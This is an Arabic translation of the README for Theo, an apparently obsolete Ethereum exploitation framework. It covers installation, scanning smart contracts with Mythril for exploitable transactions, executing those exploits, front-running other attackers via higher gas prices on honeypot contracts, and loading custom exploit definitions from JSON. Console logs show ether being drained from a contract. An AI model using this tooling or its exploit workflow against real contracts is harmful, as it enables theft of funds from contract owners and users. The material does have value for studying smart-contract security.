
أداة استطلاع واستغلال لإيثريوم.
Obsolete, not maintained anymore, don't install it, don't use it, you were warned!
تهدف Theo إلى أن تكون إطار عمل للاستغلال وأداة لاستكشاف وتفاعل البلوكشين.
المميزات:
إنه يعرف Karl من العمل.
غرض Theo هو محاربة المبتدئين (script kiddies) الذين يحاولون أن يكونوا قراصنة محترفين. يمكنه الاستماع إليهم وهم يحاولون استغلال عسلات العسل (honeypots) الخاصة به وجعلهم يخسرون أموالهم، لصالحه هو.
"لم تحضرني من أجل شخصيتي الساحرة."
Theo متاح كحزمة PyPI:
$ pip install theo
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
[--account-pk ACCOUNT_PK] [--contract ADDRESS]
[--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version]
Monitor contracts for balance changes or tx pool.
optional arguments:
-h, --help show this help message and exit
--rpc-http RPC_HTTP Connect to this HTTP RPC (default:
http://127.0.0.1:8545)
--account-pk ACCOUNT_PK
The account's private key (default: None)
--contract ADDRESS Contract to monitor (default: None)
--skip-mythril SKIP_MYTHRIL
Don't try to find exploits with Mythril (default:
False)
--load-file LOAD_FILE
Load exploit from file (default: )
--version show program's version number and exit
RPC connections:
--rpc-ws RPC_WS Connect to this WebSockets RPC (default: None)
--rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)
التثبيت من المصادر
$ git clone https://github.com/cleanunicorn/theo
$ cd theo
$ virtualenv ./venv
$ . ./venv/bin/activate
$ pip install -r requirements.txt
$ pip install -e .
$ theo --help
المتطلبات:
مسح عقد ذكي، العثور على استغلالات، استغلاله:
إعداد عسل العسل، نشر عسل العسل، انتظار المهاجم، السبق:
من الجيد التحقق من شاشة المساعدة أولاً.
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
[--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril]
[--load-file LOAD_FILE] [--version]
Monitor contracts for balance changes or tx pool.
optional arguments:
-h, --help show this help message and exit
--rpc-http RPC_HTTP Connect to this HTTP RPC (default:
http://127.0.0.1:8545)
--account-pk ACCOUNT_PK
The account's private key (default: None)
--contract ADDRESS Contract to interact with (default: None)
--skip-mythril Skip scanning the contract with Mythril (default:
False)
--load-file LOAD_FILE
Load exploit from file (default: )
--version show program's version number and exit
RPC connections:
--rpc-ws RPC_WS Connect to this WebSockets RPC (default: None)
--rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)
يتم تحديد قائمة الاستغلالات تلقائيًا باستخدام mythril.
ابدأ جلسة بتشغيل:
$ theo --contract=<scanned contract> --account-pk=<your private key>
Scanning for exploits in contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe
Connecting to HTTP: http://127.0.0.1:8545.
Found exploits(s):
[Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])]
A few objects are available in the console:
- `exploits` is an array of loaded exploits found by Mythril or read from a file
- `w3` an initialized instance of web3py for the provided HTTP RPC endpoint
Check the readme for more info:
https://github.com/cleanunicorn/theo
>>>
سيقوم بتحليل العقد والعثور على قائمة بالاستغلالات المتاحة.
يمكنك رؤية الاستغلالات المتاحة التي تم العثور عليها. في هذه الحالة تم العثور على استغلال واحد. كل استغلال هو كائن Exploit.
>>> exploits[0]
Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])
يمكن تشغيل خطوات الاستغلال عن طريق استدعاء .execute() على كائن الاستغلال. سيتم توقيع المعاملات وإرسالها إلى العقدة المتصل بها.
>>> exploits[0].execute()
2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47}
2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to be mined...
2019-07-22 11:26:16,337 - Mined
2019-07-22 11:26:16,341 - Initial balance: 1155999450759997797167 (1156.00 ether)
2019-07-22 11:26:16,342 - Final balance: 1156999450759997768901 (1157.00 ether)
يمكنك بدء مراقب السبق للاستماع للقراصنة الآخرين الذين يحاولون استغلال عسل العسل.
استخدم .frontrun() لبدء الاستماع للاستغلال، وعند العثور عليه، أرسل معاملة بسعر غاز أعلى.
>>> exploits[0].frontrun()
2019-07-22 11:22:26,285 - Scanning the mem pool for transactions...
2019-07-22 11:22:45,369 - Found tx: 0xf6041abe6e547cea93e80a451fdf53e6bdae67820244246fde44098f91ce1c20
2019-07-22 11:22:45,375 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': '0x2', 'data': '0xcf7a8965', 'gas': 30522, 'value': 1000000000000000000, 'nonce': 45}
2019-07-22 11:22:45,380 - Waiting for 0xa73316daf806e7eef83d09e467c32ce5faa239c6eda3a270a8ce7a7aae48fb7e to be mined...
2019-07-22 11:22:56,852 - Mined
"يا إلهي! لاعب الوسط في ورطة!"
يعمل هذا بشكل جيد جدًا لبعض العقود المصممة خصيصًا contracts أو بعض العقود الضعيفة الأخرى، طالما تأكدت من أن السبق في صالحك.
بدلاً من التعرف على الاستغلالات باستخدام mythril، يمكنك تحديد قائمة الاستغلالات بنفسك.
أنشئ ملفًا يشبه هذا exploits.json:
[
[
{
"name": "claimOwnership()",
"input": "0x4e71e0c8",
"value": "0xde0b6b3a7640000"
},
{
"name": "retrieve()",
"input": "0x2e64cec1",
"value": "0x0"
}
],
[
{
"name": "claimOwnership()",
"input": "0x4e71e0c8",
"value": "0xde0b6b3a7640000"
}
]
]
يحدد هذا ملف استغلالين، الأول يحتوي على معاملتين والثاني يحتوي على معاملة واحدة فقط.
يمكنك تحميله باستخدام:
$ theo --load-file=./exploits.json
إذا واجهت هذا الخطأ، فأنت بحاجة إلى مكتبات libssl المصدرية:
scrypt-1.2.1/libcperciva/crypto/crypto_aes.c:6:10: fatal error: openssl/aes.h: No such file or directory
#include <openssl/aes.h>
^~~~~~~~~~~~~~~
compilation terminated.
error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
----------------------------------------
Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-5rl4ep94/scrypt/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-mnbzx9qe-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-5rl4ep94/scrypt/
على Ubuntu يمكنك تثبيتها باستخدام:
$ sudo apt install libssl-dev